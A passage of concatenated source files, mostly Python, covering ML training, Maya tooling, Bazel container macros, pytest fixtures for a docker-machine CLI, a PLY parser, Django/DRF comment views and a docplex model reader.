logging.info("Iter: %d; Elasped: %s; ETA: %s; LR: %.3e; cls_loss: %.4f, cls_loss_aux: %.4f, cos_loss %.4f, dino_loss %.4f" % (n_iter + 1, delta, eta, cur_lr, avg_meter.pop('cls_loss'), avg_meter.pop('cls_loss_aux'), avg_meter.pop('cos_loss'), avg_meter.pop('dino_loss')))
writer.add_image("train/images", grid_imgs, global_step=n_iter)
writer.add_image("train/preds", grid_preds, global_step=n_iter)
writer.add_image("train/pseudo_gts", grid_labels, global_step=n_iter)
writer.add_image("cam/valid_cams", grid_cam, global_step=n_iter)
writer.add_image("cam/valid_cams_aux", grid_cam_aux, global_step=n_iter)
writer.add_image("cam/valid_tscams", grid_tscam, global_step=n_iter)
writer.add_image("attns/cls_token_mean_per_layer", grid_attn_cls_mean, global_step=n_iter)
writer.add_image("attns/cls_token_multi-head_last_layer", grid_attn_cls_mhsa, global_step=n_iter)
writer.add_scalars('loss', {"seg_loss": seg_loss.item(), "cls_loss": cls_loss.item()}, global_step=n_iter)
writer.add_scalars('learning_rate', {"learning_rate": optim.param_groups[0]["lr"], }, global_step=n_iter)
if (n_iter + 1) % cfg.train.eval_iters == 0:
ckpt_name = os.path.join(cfg.work_dir.ckpt_dir, "model_iter_%d.pth" % (n_iter + 1))
if args.local_rank == 0:
logging.info('Validating...')
torch.save(model.state_dict(), ckpt_name)
val_cls_score, tab_results = validate(model=model, data_loader=val_loader, cfg=cfg)
if args.local_rank == 0:
logging.info("val cls score: %.6f" % (val_cls_score))
logging.info("\n"+tab_results)
writer.add_scalars('cls_score', {"val": val_cls_score, "train": avg_meter.pop('cls_score')}, global_step=n_iter)
return True
if __name__ == "__main__":
args = parser.parse_args()
cfg = OmegaConf.load(args.config)
if args.work_dir is not None:
cfg.work_dir.dir = args.work_dir
if args.crop_size is not None:
cfg.dataset.crop_size = args.crop_size
timestamp = "{0:%Y-%m-%d-%H-%M-%S}".format(datetime.datetime.now())
cfg.work_dir.dir = os.path.join(cfg.work_dir.dir, timestamp)
cfg.work_dir.ckpt_dir = os.path.join(cfg.work_dir.dir, cfg.work_dir.ckpt_dir)
cfg.work_dir.pred_dir = os.path.join(cfg.work_dir.dir, cfg.work_dir.pred_dir)
cfg.work_dir.tb_logger_dir = os.path.join(cfg.work_dir.dir, cfg.work_dir.tb_logger_dir)
os.makedirs(cfg.work_dir.ckpt_dir, exist_ok=True)
os.makedirs(cfg.work_dir.pred_dir, exist_ok=True)
os.makedirs(cfg.work_dir.tb_logger_dir, exist_ok=True)
if args.local_rank == 0:
setup_logger(filename=os.path.join(cfg.work_dir.dir, 'train.log'))
logging.info('Pytorch version: %s' % torch.__version__)
logging.info("GPU type: %s"%(torch.cuda.get_device_name(0)))
logging.info('\nargs: %s' % args)
with open(os.path.join(cfg.work_dir.dir, 'config.yaml'), 'w') as f:
OmegaConf.save(cfg, f.name)
## fix random seed
setup_seed(1)
train(cfg=cfg)
|
py | b4033d527f829c208efc0df31cc3d44d86c30c72 | import torch
import torch.nn as nn
class PositionalEncodingLayer(nn.Module):
def __init__(self, d_model, max_len=50):
super(PositionalEncodingLayer, self).__init__()
self.d_model = d_model
self.max_len = max_len
def get_angles(self, positions, indexes):
d_model_tensor = torch.FloatTensor([[self.d_model]]).to(positions.device)
angle_rates = torch.pow(10000, (2 * (indexes // 2)) / d_model_tensor)
return positions / angle_rates
def forward(self, input_sequences):
"""
:param Tensor[batch_size, seq_len] input_sequences
:return Tensor[batch_size, seq_len, d_model] position_encoding
"""
positions = torch.arange(input_sequences.size(1)).unsqueeze(1).to(input_sequences.device) # [seq_len, 1]
indexes = torch.arange(self.d_model).unsqueeze(0).to(input_sequences.device) # [1, d_model]
angles = self.get_angles(positions, indexes) # [seq_len, d_model]
angles[:, 0::2] = torch.sin(angles[:, 0::2]) # apply sin to even indices in the tensor; 2i
angles[:, 1::2] = torch.cos(angles[:, 1::2]) # apply cos to odd indices in the tensor; 2i
position_encoding = angles.unsqueeze(0).repeat(input_sequences.size(0), 1, 1) # [batch_size, seq_len, d_model]
return position_encoding |
py | b4033d689f02bf618ca16ef50b35ce9fe45f7a68 | # Licensed under a 3-clause BSD style license - see LICENSE.rst
"""Gammapy command line and GUI tools.
"""
from .check import *
from .info import *
from .data_browser import *
from .data_manage import *
from .data_select import *
from .data_show import *
from .spectrum_regions import *
from .image_bin import *
from .image_coordinates import *
#from .image_lima import *
from .image_fit import *
from .image_lookup import *
from .image_model import *
from .image_model_sherpa import *
from .image_pipe import *
from .image_ts import *
from .cube_background import *
from .cube_bin import *
from .detect import *
from .detect_iterative import *
from .catalog_browser import *
# from .catalog_query import *
from .cta_irf import CTAIrf
|
py | b4033d78a79fbc97dfcaebb317c390d79e288782 | import maya.OpenMayaUI as apiUI
from fxpt.qt.pyside import QtWidgets, shiboken2
from fxpt.fx_texture_manager import main_window
mainWin = None
def getMayaMainWindowPtr():
ptr = apiUI.MQtUtil.mainWindow()
if not ptr:
raise RuntimeError('Cannot find Maya main window.')
else:
return ptr
def getMayaQMainWindow(ptr):
return shiboken2.wrapInstance(long(ptr), QtWidgets.QMainWindow)
def run():
global mainWin
if not mainWin:
mayaMainWin = getMayaQMainWindow(getMayaMainWindowPtr())
mainWin = main_window.TexManagerUI(mayaMainWin)
mainWin.show()
mainWin.raise_()
|
bzl | b4033df7e1ec9ad326b64a9bb54f4eb5fd194730 | load("@io_bazel_rules_docker//container:container.bzl", "container_layer")
def user_layer(name, id, user, home, shell = "/usr/sbin/nologin"):
native.genrule(
name = "user_" + id + "_" + name,
srcs = ["@containers_by_bazel//macros/user:files/passwd"],
outs = ["passwd"],
cmd = "$(location @containers_by_bazel//macros/user:add_user) $< '" + id + "' '" + user + "' '" + home + "' '" + shell + "' > $@",
tools = ["@containers_by_bazel//macros/user:add_user"],
)
native.genrule(
name = "group_" + id + "_" + name,
srcs = ["@containers_by_bazel//macros/user:files/group"],
outs = ["group"],
cmd = "$(location @containers_by_bazel//macros/user:add_group) $< '" + id + "' '" + user + "' > $@",
tools = ["@containers_by_bazel//macros/user:add_group"],
)
container_layer(
name = name,
files = [
"user_" + id + "_" + name,
"group_" + id + "_" + name,
],
directory = "/etc",
)
|
py | b4033e2c0937fb996fd4c57252397671e031f708 | import pytest
import json
from copy import copy
from os import remove, environ, mkdir
from os.path import abspath, dirname, isfile, isdir
from shutil import rmtree
from distutils.spawn import find_executable as which
from typing import Dict
from floopcli.config import _FLOOP_CONFIG_DEFAULT_CONFIGURATION
from floopcli.util.syscall import syscall
FLOOP_TEST_CONFIG_FILE = './floop.json'
FLOOP_TEST_CONFIG = _FLOOP_CONFIG_DEFAULT_CONFIGURATION
# you need to pass FLOOP_CLOUD_CORES as an env variable
_TEST_FLOOP_CLOUD_CORES = environ.get('FLOOP_CLOUD_CORES')
_TEST_CORE_NAME = 'core0'
if _TEST_FLOOP_CLOUD_CORES is not None:
# you need to pass FLOOP_CLOUD_CORES as an env variable
_TEST_CORE_NAME = _TEST_FLOOP_CLOUD_CORES.split(':')[0]
_DEVICE_TEST_SRC_DIRECTORY = '{}/src/'.format(dirname(
abspath(__file__))
)
@pytest.fixture(scope='module')
def fixture_docker_machine_bin(): # type: () -> str
return which('docker-machine')
@pytest.fixture(scope='module')
def fixture_rsync_bin(): # type: () -> str
return which('rsync')
@pytest.fixture(scope='function')
def fixture_default_config_file(request): # type: (pytest.FixtureRequest) -> str
config_file = FLOOP_TEST_CONFIG_FILE
config = FLOOP_TEST_CONFIG
def cleanup():
if isfile(config_file):
remove(config_file)
cleanup()
with open(config_file, 'w') as cf:
json.dump(config, cf)
request.addfinalizer(cleanup)
return config_file
# keep these fixtures separate to allow for fine-grained
# refactoring using different env variables
@pytest.fixture(autouse=True)
def fixture_valid_docker_machine(): # type: () -> None
if environ.get('FLOOP_LOCAL_HARDWARE_TEST'):
pass
elif environ.get('FLOOP_CLOUD_TEST'):
pass
# default to local 1GB Virtualbox machine
else:
create_local_machine = '''docker-machine create
--driver virtualbox
--virtualbox-memory 1024
{}'''.format(_TEST_CORE_NAME)
syscall(create_local_machine, check=False)
@pytest.fixture(scope='function')
def fixture_valid_target_directory(): # type: () -> str
if environ.get('FLOOP_LOCAL_HARDWARE_TEST'):
return ''
elif environ.get('FLOOP_CLOUD_TEST'):
return '/home/ubuntu/floop'
else:
return '/home/floop/floop'
@pytest.fixture(scope='function')
def fixture_valid_core_config(request): # type: (pytest.FixtureRequest) -> Dict[str, str]
if environ.get('FLOOP_LOCAL_HARDWARE_TEST'):
return {}
elif environ.get('FLOOP_CLOUD_TEST'):
return {'address' : '192.168.1.100',
'port' : '22',
'target_source' : fixture_valid_target_directory(),
'group' : 'group0',
'host_docker_machine_bin' : fixture_docker_machine_bin(),
'host_key' : '~/.ssh/id_rsa',
'build_file' : 'Dockerfile',
'test_file' : 'Dockerfile.test',
'privileged' : True,
'host_network' : True,
'docker_socket' : '/var/run/docker.sock',
'hardware_devices' : ['/dev/i2c-0'],
'host_rsync_bin' : fixture_rsync_bin(),
'host_source' : fixture_valid_src_directory(request),
'core' : _TEST_CORE_NAME,
'user' : 'floop'}
else:
return {'address' : '192.168.1.100',
'port' : '22',
'target_source' : fixture_valid_target_directory(),
'group' : 'group0',
'host_docker_machine_bin' : fixture_docker_machine_bin(),
'host_key' : '~/.ssh/id_rsa',
'build_file' : 'Dockerfile',
'test_file' : 'Dockerfile.test',
'privileged' : True,
'host_network' : True,
'docker_socket' : '/var/run/docker.sock',
'hardware_devices' : ['/dev/i2c-0'],
'host_rsync_bin' : fixture_rsync_bin(),
'host_source' : fixture_valid_src_directory(request),
'core' : _TEST_CORE_NAME,
'user' : 'floop'}
@pytest.fixture(scope='function')
def fixture_invalid_core_core_config(request): # type: (pytest.FixtureRequest) -> Dict[str, str]
config = fixture_valid_core_config(request)
config['core'] = 'thisshouldfail'
return config
@pytest.fixture(scope='function')
def fixture_valid_config_file(request): # type: (pytest.FixtureRequest) -> str
if environ.get('FLOOP_LOCAL_HARDWARE_TEST'):
return ''
elif environ.get('FLOOP_CLOUD_TEST') is not None:
cloud_cores = environ['FLOOP_CLOUD_CORES'].split(':')
src_dir = fixture_valid_src_directory(request)
config_file = fixture_default_config_file(request)
with open(config_file, 'r') as cf:
data = json.load(cf)
data['groups']['group0']['cores']['default']['host_source'] = src_dir
del data['groups']['group0']['cores']['core0']
for idx, core in enumerate(cloud_cores):
data['groups']['group0']['cores'][core] = {
'address' : '192.168.1.' + str(idx),
'port' : '22',
'target_source' : '/home/ubuntu/floop',
'user' : 'floop',
'host_key' : '~/.ssh/id_rsa'
}
with open(config_file, 'w') as cf:
json.dump(data, cf)
return config_file
else:
src_dir = fixture_valid_src_directory(request)
config_file = fixture_default_config_file(request)
with open(config_file, 'r') as cf:
data = json.load(cf)
data['groups']['group0']['cores']['default']['host_source'] = src_dir
with open(config_file, 'w') as cf:
json.dump(data, cf)
return config_file
#
#
@pytest.fixture(scope='function')
def fixture_malformed_config_file(request): # type: (pytest.FixtureRequest) -> str
config_file = fixture_valid_config_file(request)
with open(config_file, 'r') as cf:
data = json.load(cf)
data['groups'] = {}
with open(config_file, 'w') as cf:
json.dump(data, cf)
return config_file
@pytest.fixture(scope='function')
def fixture_invalid_core_config_file(request): # type: (pytest.FixtureRequest) -> str
config_file = fixture_valid_config_file(request)
with open(config_file, 'r') as cf:
data = json.load(cf)
cores = data['groups']['group0']['cores'].keys()
core = [c for c in cores if c != 'default'][0]
core_config = data['groups']['group0']['cores'][core]
for c in list(cores):
if c != 'default':
del data['groups']['group0']['cores'][c]
data['groups']['group0']['cores']['thisshouldnotwork'] = core_config
with open(config_file, 'w') as cf:
json.dump(data, cf)
return config_file
@pytest.fixture(scope='function')
def fixture_incomplete_config_file(request): # type: (pytest.FixtureRequest) -> str
config_file = fixture_valid_config_file(request)
with open(config_file, 'r') as cf:
data = json.load(cf)
data['groups'] = {
'default' : {},
'group0' : {
'cores' : {
'default' : {},
'core0' : {},
}
}
}
with open(config_file, 'w') as cf:
json.dump(data, cf)
return config_file
@pytest.fixture(scope='function')
def fixture_valid_src_directory(request): # type: (pytest.FixtureRequest) -> str
src_dir = _DEVICE_TEST_SRC_DIRECTORY
if isdir(src_dir):
rmtree(src_dir)
mkdir(src_dir)
def cleanup(): # type: () -> None
if isdir(src_dir):
rmtree(src_dir)
request.addfinalizer(cleanup)
return src_dir
@pytest.fixture(scope='function')
def fixture_buildfile(request): # type: (pytest.FixtureRequest) -> str
src_dir = fixture_valid_src_directory(request)
buildfile = '{}/Dockerfile'.format(_DEVICE_TEST_SRC_DIRECTORY)
buildfile_contents = '''FROM busybox:latest
RUN sh'''
with open(buildfile, 'w') as bf:
bf.write(buildfile_contents)
return src_dir
@pytest.fixture(scope='function')
def fixture_failing_buildfile(request): # type: (pytest.FixtureRequest) -> str
src_dir = fixture_valid_src_directory(request)
buildfile = '{}/Dockerfile'.format(_DEVICE_TEST_SRC_DIRECTORY)
buildfile_contents = '''FROM busybox:latest
RUN cp'''
with open(buildfile, 'w') as bf:
bf.write(buildfile_contents)
return src_dir
@pytest.fixture(scope='function')
def fixture_failing_runfile(request): # type: (pytest.FixtureRequest) -> str
src_dir = fixture_valid_src_directory(request)
buildfile = '{}/Dockerfile'.format(_DEVICE_TEST_SRC_DIRECTORY)
buildfile_contents = '''FROM busybox:latest
CMD ["apt-get", "update"]'''
with open(buildfile, 'w') as bf:
bf.write(buildfile_contents)
return src_dir
@pytest.fixture(scope='function')
def fixture_testfile(request): # type: (pytest.FixtureRequest) -> str
src_dir = fixture_valid_src_directory(request)
testfile = '{}/Dockerfile.test'.format(_DEVICE_TEST_SRC_DIRECTORY)
testfile_contents = '''FROM busybox:latest
run sh'''
with open(testfile, 'w') as tf:
tf.write(testfile_contents)
return src_dir
@pytest.fixture(scope='function')
def fixture_failing_testfile(request): # type: (pytest.FixtureRequest) -> str
src_dir = fixture_valid_src_directory(request)
buildfile = '{}/Dockerfile.test'.format(_DEVICE_TEST_SRC_DIRECTORY)
buildfile_contents = '''FROM busybox:latest
CMD ["apt-get", "update"]'''
with open(buildfile, 'w') as tf:
tf.write(buildfile_contents)
return src_dir
@pytest.fixture(scope='function')
def fixture_redundant_config_file(request): # type: (pytest.FixtureRequest) -> str
config_file = fixture_valid_config_file(request)
with open(config_file, 'r') as cf:
data = json.load(cf)
core = [k for k in data['groups']['group0']['cores'].keys() if k != 'default'][0]
core_config = data['groups']['group0']['cores'][core]
default_config = data['groups']['group0']['cores']['default']
data['groups']['group0']['cores'] = {
'default' : default_config,
'core0' : core_config, 'core1' : core_config}
with open(config_file, 'w') as cf:
json.dump(data, cf)
return config_file
@pytest.fixture(scope='function')
def fixture_missing_property_config_file(request): # type: (pytest.FixtureRequest) -> str
config_file = fixture_valid_config_file(request)
with open(config_file, 'r') as cf:
data = json.load(cf)
core_config = data['groups']['group0']['cores'][_TEST_CORE_NAME]
del core_config['user']
default_config = data['groups']['group0']['cores']['default']
data['groups']['group0']['cores'] = {
'default' : default_config,
_TEST_CORE_NAME : core_config}
with open(config_file, 'w') as cf:
json.dump(data, cf)
return config_file
@pytest.fixture(scope='function')
def fixture_nonexistent_source_dir_config(request): # type: (pytest.FixtureRequest) -> str
test_config = fixture_valid_core_config(request)
test_config['host_source'] = \
'definitely/not/a/real/directory/'
return test_config
@pytest.fixture(scope='function')
def fixture_nonexistent_source_dir_cli_config_file(request): # type: (pytest.FixtureRequest) -> str
config_file = fixture_valid_config_file(request)
with open(config_file, 'r') as cf:
data = json.load(cf)
data['groups']['group0']['cores']['default']['host_source'] =\
'definitely/not/a/real/src/dir/'
with open(config_file, 'w') as cf:
json.dump(data, cf)
return config_file
@pytest.fixture(scope='function')
def fixture_protected_target_directory_config(request): # type: (pytest.FixtureRequest) -> str
test_config = fixture_valid_core_config(request)
test_config['target_source'] = '/.test/'
return test_config
@pytest.fixture(scope='function')
def fixture_docker_machine_wrapper(request): # type: ignore
def wrapper(): # type: () -> None
fixture_valid_docker_machine()
return wrapper
|
py | b4033e45a9d89772bdfe7b14848c4c10e27e7e07 | # -----------------------------------------------------------------------------
# Moisés Fernández Zárate A01197049
# littleducklex.py
#
# Little Duck Language 2020 parser with python using PLY (Python Lex Yacc).
# -----------------------------------------------------------------------------
import sys
import ply.yacc as yacc
from littleducklex import tokens
# Programa
def p_programa(p):
'''
programa : PROGRAM ID SEMICOLON vars bloque
| PROGRAM ID SEMICOLON bloque
'''
p[0] = "PROGRAM COMPILED SUCCESFULLY."
# Vars
def p_vars(p):
'''
vars : VARS varArgs
'''
def p_varArgs(p):
'''
varArgs : ID COLON tipo SEMICOLON
| ID COLON tipo COLON varArgs
| ID COMMA varArgs
'''
# Var tipo
def p_tipo(p):
'''
tipo : INT
| FLOAT
'''
# Bloque
def p_bloque(p):
'''
bloque : LBRACE estatutos RBRACE
'''
# Estatutos
def p_estatutos(p):
'''
estatutos : estatuto
| estatuto estatutos
| empty
'''
# Estatuto
def p_estatuto(p):
'''
estatuto : asignacion
| condicion
| escritura
'''
# Asignacion
def p_asignacion(p):
'''
asignacion : ID EQUAL expresion SEMICOLON
'''
# Expresion
def p_expresion(p):
'''
expresion : exp expresionP
'''
def p_expresionP(p):
'''
expresionP : LESS exp
| GREATER exp
| DIFFERENT exp
| empty
'''
# Exp
def p_exp(p):
'''
exp : termino expP
'''
def p_expP(p):
'''
expP : PLUS termino expP
| MINUS termino expP
| empty
'''
# Término
def p_termino(p):
'''
termino : factor terminoP
'''
def p_terminoP(p):
'''
terminoP : MULT factor terminoP
| DIV factor terminoP
| empty
'''
# Escritura
def p_escritura(p):
'''
escritura : PRINT LPAREN escrituraP RPAREN SEMICOLON
'''
def p_escrituraP(p):
'''
escrituraP : expresion
| expresion COMMA escrituraP
| CTES
| CTES COMMA escrituraP
'''
# Condicion
def p_condicion(p):
'''
condicion : condicionP bloque SEMICOLON
| condicionP bloque ELSE bloque SEMICOLON
'''
def p_condicionP(p):
'''
condicionP : IF LPAREN expresion RPAREN
'''
# Factor
def p_factor(p):
'''
factor : LPAREN expresion RPAREN
| factorP
'''
def p_factorP(p):
'''
factorP : PLUS varcte
| MINUS varcte
| varcte
'''
# VARCTE
def p_varcte(p):
'''
varcte : ID
| CTEI
| CTEF
'''
def p_empty(p):
'''
empty :
'''
# Error rule for syntax errors
def p_error(p):
print("ERROR {}".format(p))
# Build the parser
yacc.yacc()
if __name__ == '__main__':
try:
arch_name = 'prueba2.txt'
arch = open(arch_name,'r')
print("Nombre de archivo a leer: " + arch_name)
info = arch.read()
# print(info)
arch.close()
if(yacc.parse(info, tracking = True) == 'PROGRAM COMPILED SUCCESFULLY.'):
print("Correct syntax.")
else:
print("Syntax error.")
except EOFError:
print(EOFError) |
py | b4033f08f3c39584bcc0bbd54828149aacf12d3a | from ._version import get_versions
__version__ = get_versions()['version']
del get_versions
__version_info__ = tuple(__version__.split("."))
|
py | b4033f913d8060afdcba8884ed7a0362d40a0c59 | from django.db import models
from django.template.defaultfilters import slugify
from users.models import CustomUser
STATUS_CHOICES = (('FMC', 'FMC'), ('PMC', 'PMC'), ('NMC', 'NMC'), ('ASI', 'ASI'),)
PRIORITY_CHOICES = (('High', 'High'), ('Normal', 'Normal'), ('Low', 'Low'),)
class Unit(models.Model):
title = models.CharField(max_length=50, unique=True)
location = models.CharField(max_length=50)
favorites = models.ManyToManyField("self", blank=True)
users = models.ManyToManyField(CustomUser)
slug = models.SlugField(default='')
def __str__(self):
return self.title
def save(self, *args, **kwargs):
if not self.id:
self.slug = slugify(self.title)
super(Unit, self).save(*args, **kwargs)
class ContactInfo(models.Model):
poc = models.CharField(max_length=50)
phone = models.CharField(max_length=10)
email = models.EmailField()
unit = models.OneToOneField(Unit, on_delete=models.CASCADE, related_name='contact_info')
def __str__(self):
return self.poc
class Message(models.Model):
subject = models.CharField(max_length=50)
priority = models.CharField(choices=PRIORITY_CHOICES, max_length=10, default='Normal')
created_at = models.DateTimeField(auto_now_add=True)
body = models.TextField(max_length=1000)
unit = models.ForeignKey(Unit, on_delete=models.CASCADE, related_name='messages')
class Meta:
ordering = ['-created_at']
def __str__(self):
return self.subject
class NetworkBoard(models.Model):
overall_status = models.CharField(choices=STATUS_CHOICES, max_length=3)
updated_at = models.DateTimeField(auto_now=True)
unit = models.OneToOneField(Unit, on_delete=models.CASCADE, related_name='network_board')
def __str__(self):
return "{}: {}".format(self.unit, self.overall_status)
class Service(models.Model):
name = models.CharField(max_length=50)
status = models.CharField(choices=STATUS_CHOICES, max_length=3)
more_info = models.TextField(max_length=500, blank=True)
network_board = models.ForeignKey(NetworkBoard, on_delete=models.CASCADE, related_name='services')
def __str__(self):
return self.name
|
py | b4033fdc90196af9ad74d746190250090f4656e1 | from rest_framework.views import APIView
from rest_framework import generics,status
from rest_framework.pagination import PageNumberPagination
from rest_framework.permissions import IsAuthenticated,IsAdminUser
from rest_framework.response import Response
from rest_framework.decorators import api_view
from django.shortcuts import get_object_or_404
from django_redis import get_redis_connection
from .serializers import CommentSerializer
from .models import Comment
from notes.models import Article
# Create your views here.
class CommentPagination(PageNumberPagination):
page_size = 6
page_query_param = 'page'
max_page_size = 10
page_size_query_param = 'page_size'
class CommentItemView(APIView):
# permission_classes = [IsAuthenticated, ]
def get(self, request, comment_id, format=None):
comment = get_object_or_404(Comment, id=comment_id)
serializer = CommentSerializer(comment, context={'request': request})
return Response(serializer.data)
class ArticleCommentsRootView(APIView):
def get(self, request, article_id, format=None):
article = get_object_or_404(Article, id=article_id)
comments = Comment.objects.filter(article=article, parent=None)
count = Comment.objects.filter(article=article).count()
serializer = CommentSerializer(comments, many=True, context={'request':request})
return Response({
'root': serializer.data,
'count': count
})
class ArticleCommentsChildrenView(APIView):
def __init__(self):
super(ArticleCommentsChildrenView,self).__init__()
self.children = []
def children_mapper(self, root, request):
if root and root['children'] != []:
for child_id in list(root['children']):
child = get_object_or_404(Comment, id=child_id)
self.children.append(child)
child_serializer = CommentSerializer(child, context={'request': request})
self.children_mapper(dict(child_serializer.data), request)
def get(self, request, parent_comment_id, format=None):
parent = get_object_or_404(Comment, id=parent_comment_id)
parent_serializer = CommentSerializer(parent, context={'request': request})
self.children_mapper(dict(parent_serializer.data), request)
serializer = CommentSerializer(self.children, many=True, context={'request': request})
return Response(serializer.data)
class CommentsListView(generics.ListAPIView):
serializer_class = CommentSerializer
pagination_class = CommentPagination
permission_classes = [IsAdminUser,]
def get_queryset(self):
return Comment.objects.filter(parent=None)
class CommentCreateView(generics.CreateAPIView):
serializer_class = CommentSerializer
pagination_class = CommentPagination
permission_classes = [IsAuthenticated, ]
def create(self, request, *args, **kwargs):
serializer = self.get_serializer(data=request.data, context={**kwargs, 'request': request})
serializer.is_valid(raise_exception=True)
self.perform_create(serializer)
headers = self.get_success_headers(serializer.data)
return Response(serializer.data, status=status.HTTP_201_CREATED, headers=headers)
class CommentDelView(APIView):
def get(self, request, comment_id, format=None):
comment = get_object_or_404(Comment, id=comment_id)
if request.user != comment.user:
return Response({
'message': '非评论用户!'
}, status=status.HTTP_400_BAD_REQUEST)
comment.delete()
return Response({'message': 'OK'})
@api_view()
def comment_up(request, comment_id):
comment = get_object_or_404(Comment, id=comment_id)
user = request.user
redis_conn = get_redis_connection('session')
flag = redis_conn.get('lik_cm_%d_user_%d' % (comment_id, user.id))
if flag is None:
# 如果没有点赞
comment.likes += 1
comment.save()
redis_conn.set('lik_cmt_%d_user_%d' % (comment_id, user.id), '1')
return Response({'message': 'OK', 'likes': comment.likes})
else:
# 如果已经点赞,取消点赞
comment.likes -= 1
comment.save()
redis_conn.delete('lik_cmt_%d_user_%d' % (comment_id, user.id))
return Response({'message': 'enable', 'likes': comment.likes})
@api_view()
def check_comment_up(request, comment_id):
redis_conn = get_redis_connection('session')
comment = get_object_or_404(Comment, id=comment_id)
flag = redis_conn.get('lik_cmt_%d_user_%d' % (comment_id, request.user.id))
if flag is None:
return Response({'message': 'no', 'likes': comment.likes})
else:
return Response({'message': 'yes', 'likes': comment.likes})
@api_view()
def get_article_comments_count(request, article_id):
article = get_object_or_404(Article, id=article_id)
return Response({
"count": article.comments.count(),
"code": 200,
})
|
py | b403415322ed0e72af05a25154aebef25eabefd5 | # --------------------------------------------------------------------------
# Source file provided under Apache License, Version 2.0, January 2004,
# http://www.apache.org/licenses/
# (c) Copyright IBM Corp. 2015, 2016
# --------------------------------------------------------------------------
import os
# docplex
from docplex.mp.model import Model
from docplex.mp.utils import DOcplexException
from docplex.mp.params.cplex_params import get_params_from_cplex_version
from docplex.mp.constants import ComparisonType
from docplex.mp.constr import LinearConstraint
from docplex.mp.cplex_adapter import CplexAdapter
from docplex.mp.compat23 import izip
from docplex.mp.quad import VarPair
class ModelReaderError(DOcplexException):
pass
class _CplexReaderFileContext(object):
def __init__(self, filename, read_method=None):
self._cplex = None
self._filename = filename
self._read_method = read_method or ["read"]
def __enter__(self):
self.cpx_adapter = CplexAdapter()
cpx = self.cpx_adapter.cpx
# no output from CPLEX
cpx.set_results_stream(None)
cpx.set_log_stream(None)
cpx.set_warning_stream(None)
cpx.set_error_stream(None)
self_read_fn = cpx
for m in self._read_method:
self_read_fn = self_read_fn.__getattribute__(m)
try:
self_read_fn(self._filename)
self._cplex = cpx
return self.cpx_adapter
except self.cpx_adapter.CplexError as cpx_e: # pragma: no cover
# delete cplex instance
del cpx
raise ModelReaderError("*CPLEX error {0!s} reading file {1} - exiting".format(cpx_e, self._filename))
# noinspection PyUnusedLocal
def __exit__(self, exc_type, exc_val, exc_tb):
cpx = self._cplex
if cpx is not None:
del cpx
self._cplex = None
# noinspection PyArgumentList
class ModelReader(object):
""" This class is used to read models from CPLEX files (e.g. SAV, LP, MPS)
Note:
This class requires CPLEX to be installed and present in ``PYTHONPATH``. The following file formats are
accepted: LP, SAV, MPS.
Example:
Use the class method ``read`` to read a model file.
Reads the contents of file ``mymodel.sav`` into an `AdvModel` instance, built with the context `my_ctx`,
with the parameter ``ignore_names`` set to True::
m = ModelReader.read(path='mymodel.lp', model_class=AdvModel, context=my_ctx, ignore_names=True)
"""
@staticmethod
def _build_linear_expr_from_sparse_pair(lfactory, var_map, cpx_sparsepair):
expr = lfactory.linear_expr(arg=0, safe=True)
for ix, k in izip(cpx_sparsepair.ind, cpx_sparsepair.val):
dv = var_map[ix]
expr._add_term(dv, k)
return expr
_sense2comp_dict = {'L': ComparisonType.LE, 'E': ComparisonType.EQ, 'G': ComparisonType.GE}
# noinspection PyDefaultArgument
@classmethod
def parse_sense(cls, cpx_sense, sense_dict=_sense2comp_dict):
return sense_dict.get(cpx_sense)
@classmethod
def read_prm(cls, filename):
""" Reads a CPLEX PRM file.
Reads a CPLEX parameters file and returns a DOcplex parameter group
instance. This parameter object can be used in a solve().
Args:
filename: a path string
Returns:
A `RootParameterGroup object`, if the read operation succeeds, else None.
"""
# TODO: Clean up - now creating an adapter raise importError if CPLEX not found
# if not Cplex: # pragma: no cover
# raise RuntimeError("ModelReader.read_prm() requires CPLEX runtime.")
with _CplexReaderFileContext(filename, read_method=["parameters", "read_file"]) as adapter:
cpx = adapter.cpx
if cpx:
# raw parameters
params = get_params_from_cplex_version(cpx.get_version())
for param in params:
try:
cpx_value = cpx._env.parameters._get(param.cpx_id)
if cpx_value != param.default_value:
param.set(cpx_value)
except adapter.CplexError: # pragma: no cover
pass
return params
else: # pragma: no cover
return None
@staticmethod
def _safe_call_get_names(cpx_adapter, get_names_fn, fallback_names=None):
# cplex crashes when calling get_names on some files (e.g. SAV)
# in this case filter out error 1219
# and return a fallback list with None or ""
try:
names = get_names_fn()
return names
# except TypeError:
# print("** type error ignored in call to {0}".format(get_names_fn.__name__))
# return fallback_names or []
except cpx_adapter.CplexSolverError as cpxse: # pragma: no cover
errcode = cpxse.args[2]
# when all indicators have no names, cplex raises this error
# CPLEX Error 1219: No names exist.
if errcode == 1219:
return fallback_names or []
else:
# this is something else
raise
@classmethod
def _read_cplex(cls, filename, silent=True):
cpx_adapter = CplexAdapter()
cpx = cpx_adapter.cpx
# no warnings
if silent:
cpx.set_results_stream(None)
cpx.set_log_stream(None)
cpx.set_warning_stream(None)
cpx.set_error_stream(None) # remove messages about names
try:
cpx.read(filename)
return cpx_adapter
except cpx_adapter.CplexError as cpx_e:
raise ModelReaderError("*CPLEX error {0!s} reading file {1} - exiting".format(cpx_e, filename))
@classmethod
def _make_expr_from_coef_vector(cls, mdl, index_2var_map, coeffs, offset):
all_obj_vars = []
all_obj_coefs = []
for v in range(mdl.number_of_variables):
if v in index_2var_map:
obj_coeff = coeffs[v]
if obj_coeff:
all_obj_coefs.append(obj_coeff)
all_obj_vars.append(index_2var_map[v])
expr = mdl._aggregator._scal_prod(all_obj_vars, all_obj_coefs)
if offset:
expr += offset
return expr
@classmethod
def _make_expr_from_vars_coefs(cls, mdl, dvars, coefs, offset=0):
terms_dict = mdl._lfactory._new_term_dict()
for dv, k in izip(dvars, coefs):
if k:
terms_dict[dv] = k
return mdl._lfactory.linear_expr(arg=terms_dict, constant=offset, safe=True)
@classmethod
def _make_expr_from_varmap_coefs(cls, lfactory, varmap, dvarxs, coefs, offset=0):
terms_dict = lfactory._new_term_dict()
for dvx, k in izip(dvarxs, coefs):
dv = varmap.get(dvx)
if dv is not None:
terms_dict[dv] = k
return lfactory.linear_expr(arg=terms_dict, constant=offset, safe=True)
@classmethod
def read(cls, filename, model_name=None, verbose=False, model_class=None, **kwargs):
""" Reads a model from a CPLEX export file.
Accepts all formats exported by CPLEX: LP, SAV, MPS.
If an error occurs while reading the file, the message of the exception
is printed and the function returns None.
Args:
filename: The file to read.
model_name: An optional name for the newly created model. If None,
the model name will be the path basename.
verbose: An optional flag to print informative messages, default is False.
model_class: An optional class type; must be a subclass of Model.
